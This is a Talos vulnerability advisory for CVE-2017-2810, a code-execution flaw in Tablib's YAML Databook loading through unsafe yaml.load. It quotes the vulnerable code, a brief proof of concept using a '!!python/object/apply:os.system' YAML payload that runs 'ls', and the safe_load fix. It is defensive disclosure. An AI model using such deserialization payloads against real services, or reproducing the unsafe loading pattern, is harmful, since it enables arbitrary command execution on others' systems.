Talos Vulnerability Report

TALOS-2017-0307

Tablib Yaml Load Code Execution Vulnerability

June 13, 2017
CVE Number

CVE-2017-2810

Summary

An exploitable vulnerability exists in the Databook loading functionality of Tablib. A yaml loaded Databook can execute arbitrary python commands resulting in command execution. An attacker can insert python into loaded yaml to trigger this vulnerability.

Tested Versions

Tablib v0.11.4

Product URLs

https://pypi.python.org/pypi/tablib

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-502 - Deserialization of Untrusted Data

Details

Tablib is a Python dataset library used to agnostically generate various tabular formats from data. Tablib is also the main driver behind django-import-export application and library.

tablib/formats/_yaml.py:31
def import_book(dbook, in_stream):
    """Returns databook from YAML stream."""

    dbook.wipe()

    for sheet in yaml.load(in_stream): [0]
        data = tablib.Dataset()
        data.title = sheet['title']
        data.dict = sheet['data']
        dbook.add_sheet(data)

Tablib is leveraging the unsafe API yaml.load [0] for importing the current yaml stream into to Databook.. This yaml can contain a python directive to execute arbitrary commands.

Exploit Proof-of-Concept

A test leveraging the Tablib API shows the commands being executed:

(tablib) user in ~
In [1]: import tablib

In [2]: databook = tablib.Databook()

In [3]: databook.load('yaml', '!!python/object/apply:os.system ["ls"]')
AUTHORS         HISTORY.rst     MANIFEST.in     NOTICE          build           docs            tablib          test_tablib.py
HACKING         LICENSE         Makefile        README.rst      dist            setup.py        tablib.egg-info tox.ini

Mitigation

Replace yaml.load with yaml.safe_load

Timeline

2017-04-18 - Vendor Disclosure
2017-06-13 - Public Release

Credit

Discovered by Cory Duplantis of Cisco Talos.